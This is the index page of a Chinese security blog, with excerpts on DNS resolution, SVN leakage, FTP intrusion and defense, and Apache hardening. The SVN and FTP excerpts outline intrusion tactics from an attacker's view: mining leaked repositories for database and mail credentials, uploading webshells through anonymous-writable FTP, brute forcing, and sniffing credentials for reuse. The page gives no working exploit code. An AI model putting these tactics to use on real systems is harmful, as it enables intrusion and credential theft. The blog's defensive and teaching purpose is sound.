<a href="/categories/DNS-深度理解/">DNS 深度理解</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 首先,我们先来简单回顾下<code>DNS的基本解析流程</code>, 比较简单,如下<br><figure class="highlight haml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">-<span class="ruby">> 以客户端浏览器访问 www.rootkit.org 域名为例,首先,它会去检查当前浏览器缓存,如果有,就直接响应,如果没有,就继续往下找</span></div><div class="line"> -<span class="ruby">> 接着,操作系统会去检查自己的host文件,如果从中没找到对应关系,会再到系统dns缓存中查,如果缓存中有,就直接返回该域名所对应的ip</span></div><div class="line"> -<span class="ruby">> 如果缓存中没有,则会向我们事先设置好的dns服务器 [ 一般有两个, 主 & 备 ] 去请求,即所谓的<span class="string">`递归查询`</span>,dns服务器首先会到自身解析数据库中去查</span></div><div class="line"> -<span class="ruby">> 如果dns服务器在自己的解析库中也没找到,它就会自动帮我们向根发送询问请求</span></div><div class="line"> -<span class="ruby">> 此时,根看到要请求的是org的后缀,就会把org所在的ns服务器告诉我们的dns</span></div><div class="line"> -<span class="ruby">> 然后,我们的dns服务器就会去请求org所在的ns服务器</span></div><div class="line"> -<span class="ruby">> 当请求到达org ns服务器时,org一看域名是在rootkit这个域下的,就会把rootkit所在的ns服务器再告诉我们的dns服务器</span></div><div class="line"> -<span class="ruby">> 再然后,我们的dns服务器就会去请求rootkit这个域的ns服务器</span></div><div class="line"> -<span class="ruby">> rootkit这个域的ns服务器一看是要访问www就直接找到了www对应的A记录的ip,并把它丢给我们的dns,上面逐个询问的过程,即 <span class="string">`迭代查询`</span></span></div><div class="line"> -<span class="ruby">> 最后,我们的dns再把最终解析到的这个ip丢给我们的客户端,然后客户端就直接拿着去访问了,如下,访问google.com时的简易流程图</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/11/Dns-tips/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/10/svn-config-sec/">
不再让 `泄露` 拖你的后腿 [ subversion篇 ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-10</span>
<span class="category">
<a href="/categories/svn/">svn</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 关于 svn<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">同属C/S架构,对于svn服务端来讲,任何一个文件,在任何时刻的变化,都会被svn详细记录,并自动备份修改之前的结果,方便后续回滚</div><div class="line">其实,底层也是靠一个独立的`文件系统 FSFS`在维护,更多内部工作细节,大家可以直接去参考百科说明,此处废话不多讲,我们直奔主题...</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>演示环境,注,此处为独立部署svn服务器,并非配合web服务一起使用<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">CentOS6</span><span class="selector-class">.9_x86_64</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.59</span></div><div class="line"><span class="selector-tag">win7cn</span> <span class="selector-tag">ip</span>: 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.70</span></div></pre></td></tr></table></figure></p>
<p>0x02 作为一名入侵者,从<code>svn</code>中你都能发掘到什么宝藏<br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">可能最容易拿到的就是数据库的各种连接账号密码,前提是,目标数据库允许外连,这样你才能更优雅的脱裤或者想办法构造上传webshell</div><div class="line">一些邮箱账号密码,如果目标有自己的vpn或者owa之类的入口还是很值得尝试的</div><div class="line">直接的后端代码,除了能局部审下代码之外,在注释里面也许还能看到一些关于开发人员的敏感信息</div><div class="line">其它的各种敏感配置信息,非常多,这里就不一一细说了</div><div class="line">注意,有些信息,确实不能让我们一刀毙敌,但高效的渗透往往是对各类敏感信息的相互配合及深度利用,这非常重要</div><div class="line">...</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/10/svn-config-sec/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/12/09/vsftp-secfig/">
简述 FTP 入侵与防御 [ vsftpd ]
</a>
</h1>
<div class="post-info">
<span class="date">2017-12-09</span>
<span class="category">
<a href="/categories/vsftp/">vsftp</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 首先,我们先来简单思考下,当你面对一台 ftp 时,到底能做些什么<br><figure class="highlight applescript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">挖<span class="number">0</span><span class="built_in">day</span>,抱歉,并不在今天的讨论范畴 ^_^</div><div class="line">允许匿名可写,直接上传webshell,一般极小的个人站才有可能,ftp目录即网站目录</div><div class="line">允许匿名下载,造成的敏感文件信息泄露</div><div class="line">爆破,亦可造成敏感配置泄露</div><div class="line">嗅探,搜集各种明文账号密码,然后再拿着这些账号密码,去撞目标的其它入口,或以此进行进一步的内网渗透</div><div class="line">提权,linux平台下基本不可能</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>0x02 相对主流的一些ftp工具<br><figure class="highlight gams"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="title">vsftpd</span></span> proftpd filezilla ...</div></pre></td></tr></table></figure></p>
<p>0x03 深入理解ftp的主动与被动工作模式</p>
<p><code>命令连接</code><br><figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">在客户端向ftp服务端发起连接请求时,客户端会随机选择本地的某个tcp端口与ftp服务端的<span class="number">21</span>端口进行连接</div><div class="line">这中间会进行一系列的身份验证过程,待验证通过后,客户端与ftp服务端即会成功建立 `命令连接`</div><div class="line">所谓的 `命令传输连接` 也就是说,仅仅只会用这个连接来传输命令本身</div></pre></td></tr></table></figure></p>
<p><code>主动模式</code><br><figure class="highlight clean"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">在 `命令连接` 建立成功后,客户端可能还需要进行一系列的数据传输动作,如,上传,下载文件...</div><div class="line">此时,客户端会先在本地另启一个端口监听等待连接,并利用先前与ftp服务端建立好的`命令连接`通道,告诉ftp服务端客户端所监听的端口</div><div class="line">而后,ftp服务端会利用自身的<span class="number">20</span>端口和刚才ftp客户端所告知的端口进行数据连接,随后就开始利用此连接来进行各类数据传输</div><div class="line">注意,此时`数据连接`在建立的过程中,是ftp服务端的<span class="number">20</span>端口主动连接FTP客户端的随机端口的,也就是我们所说的`主动模式`</div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/12/09/vsftp-secfig/" class="read-more">Read More</a>
</div>
<div class="post">
<div class="post-header index">
<h1 class="title">
<a href="/2017/11/26/apache-sec/">
如何将你的 apache 把控的'密不透风'
</a>
</h1>
<div class="post-info">
<span class="date">2017-11-26</span>
<span class="category">
<a href="/categories/apachesec/">apachesec</a>
</span>
</div>
</div>
<div class="content">
<p>0x01 为防止配置或端口冲突,在装之前,你需要先仔细检查当前系统有没有装apache,如果有<code>先把apache服务停掉,然后卸载apache</code>,等会儿用源码重新编译安装<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> rpm -qa httpd</span></div><div class="line"><span class="meta">#</span><span class="bash"> rpm -e --nodeps * 强制卸载apache</span></div></pre></td></tr></table></figure></p>
<p>演示环境<br><figure class="highlight css"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="selector-tag">CentOS6</span><span class="selector-class">.8</span> <span class="selector-tag">x86_64</span> 最小化,带基础库安装 <span class="selector-tag">eth0</span> : 192<span class="selector-class">.168</span><span class="selector-class">.3</span><span class="selector-class">.45</span> <span class="selector-tag">eth1</span> : 192<span class="selector-class">.168</span><span class="selector-class">.4</span><span class="selector-class">.16</span> <span class="selector-tag">eth2</span> : 192<span class="selector-class">.168</span><span class="selector-class">.5</span><span class="selector-class">.16</span></div><div class="line"><span class="selector-tag">httpd-2</span><span class="selector-class">.2</span><span class="selector-class">.34</span><span class="selector-class">.tar</span><span class="selector-class">.gz</span> <span class="selector-tag">apache</span>官方提供的源码包</div></pre></td></tr></table></figure></p>
<p>0x02 下载apache源码包,这里暂时选择2.2.x系列的最新版,不建议再用比这个还老的版本了,漏洞比较多<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="meta">#</span><span class="bash"> wget http://apache.website-solution.net/httpd/httpd-2.2.34.tar.gz</span></div><div class="line"><span class="meta">#</span><span class="bash"> tar xf httpd-2.2.34.tar.gz && <span class="built_in">cd</span> httpd-2.2.34</span></div></pre></td></tr></table></figure></p>
<p>0x03 直接到源码中去<code>改掉apache的详细版本信息</code>,跟部署nginx一样,尽可能地扰乱入侵者的判断,这里就把它模拟成IIS 7.5,实际系统应为win server 2008r2<br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="meta"># vi <span class="meta-keyword">include</span>/ap_release.h</span></div></pre></td></tr></table></figure></p>
</div>
<a href="/2017/11/26/apache-sec/" class="read-more">Read More</a>
</div>
</section>
</div>
</div>
<div class="row">
<div class="col-sm-12">
<div class="wrap-pagination">
<a class="disabled" href="/">
<i class="fa fa-chevron-left" aria-hidden="true"></i>
</a>
<a class="" href="/page/2/">
<i class="fa fa-chevron-right" aria-hidden="true"></i>
</a>
</div>
</div>
</div>
</div>
<!-- Footer -->
<div class="push"></div>
<footer class="footer-content">
<center>
<span>有偿提供各类全面靠谱的安全优化加固方案,入侵取证及全方位企业内部及个人网络安全培训...<font color="red"> klion@protonmail.com</font></span><br>
<br>
<br>
<font size="5" color="#00FF7F" style="margin-left:-10px;">关注公众号</font> <font size="5" color="#00FF7F">随意捐助 [ 微信 ]</font> <font size="5" color="#00FF7F">加入小密圈</font>
<br>
<br>
<img src="/img/small.jpg" alt="klionsec" />
<img src="/img/klion.png" width="262" height="254" alt="klionsec"> <img src="/img/xiaomi.png" width="260" height="257" alt="小密圈">
<br><br>
<br><font color="yellow" size="4">
如果觉得内容还不错,也希望您能高抬贵手帮忙转发一下,让更多需要的人都能看到,本人不胜感激
</font><br><br>
<font color="#00FF7F" size="4">
相信您的支持和鼓励换来的将会是更高质量的不懈创作,本人将一直秉承博客初衷,坚持高质量原创实用干货分享</font>
<br><br><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span id="busuanzi_container_site_pv">博客累计访问量 <span id="busuanzi_value_site_pv"></span> </span>
<span id="busuanzi_container_site_uv">
累计访客数 <span id="busuanzi_value_site_uv"></span>
</span>
<span id="showDays"></span>
<script>
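/**
 * Number of whole days elapsed from `start` to `now`.
 *
 * @param {Date} start  the blog's launch date
 * @param {Date} [now]  reference instant; defaults to the current time
 * @returns {number} whole days, floored (negative when `now` precedes `start`)
 */
function daysSince(start, now) {
  var reference = now || new Date();
  var msPerDay = 1000 * 60 * 60 * 24;
  return Math.floor((reference.getTime() - start.getTime()) / msPerDay);
}

// Fill #showDays with the blog's age. Wrapped in an IIFE so the temporaries
// no longer leak onto window; the launch date is built from numeric parts
// because parsing a "MM/DD/YYYY" string is implementation-defined in ECMAScript.
(function () {
  var birthDay = new Date(2014, 11, 28); // 28 Dec 2014, local time
  var total = daysSince(birthDay);
  var target = typeof document !== "undefined" ? document.getElementById("showDays") : null;
  if (target) {
    // textContent: the value is plain text, so no markup parsing is needed.
    target.textContent = " 其实,博客已默默独自坚挺了 " + total + " 天";
  }
})();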
</script>
<br>
<br>
多年实战渗透经验积累[大中小型网络] + 娴熟的底层及脚本编写能力 + 熟练的协议分析能力 + 多个大中型安全架构实际设计部署经验 + 良好的逆向分析能力[一定的0day挖掘能力] = 合格安全架构师
<br>
<br>
<br>
<font size="6" color="white">唯一不变的,就是一直在变</font>
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<ul class="list-inline footer-social-icons">
<li class="list-inline-item">
<a href="https://github.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-github"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://twitter.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-twitter"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://www.facebook.com/klionsec">
<span class="footer-icon-container">
<i class="fa fa-facebook"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="http://www.jianshu.com/u/2a4d8b1f03e0">
<span class="footer-icon-container">
<i class="fa fa-instagram"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="https://www.zhihu.com/people/klionsec/activities">
<span class="footer-icon-container">
<i class="fa fa-dribbble"></i>
</span>
</a>
</li>
<li class="list-inline-item">
<a href="mailto:klion@protonmail.com">
<span class="footer-icon-container">
<i class="fa fa-envelope-o"></i>
</span>
</a>
</li>
</ul>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<div class="footer-copyright">
<strong><font size="4" color="#00FF7F"> Blog by klionsec </font></strong>
</div>
</div>
</div>
</div>
<!--
<audio autoplay="autoplay" width="300" height="200">
<source src="/img/Bandari - Childhood Memory.mp3" type="audio/mpeg" />
</audio>
-->
</footer>
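<!-- After footer scripts -->
<!-- The three CDN-hosted libraries below run with full access to the page.
     They are fetched over https (explicit scheme instead of protocol-relative)
     but are not yet pinned: add integrity="sha384-<hash-of-served-file>"
     and crossorigin="anonymous" to each once the hashes are computed, so a
     modified CDN copy is rejected by the browser. jQuery 2.1.4 is an old
     release; check the project's published advisories before keeping it. -->
<!-- jQuery -->
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<!-- Tween Max -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>
<!-- Gallery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" charset="utf-8"></script>
<!-- Custom JavaScript -->
<script src="/js/main.js"></script>
<!-- Disqus Comments -->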
</body>
</html>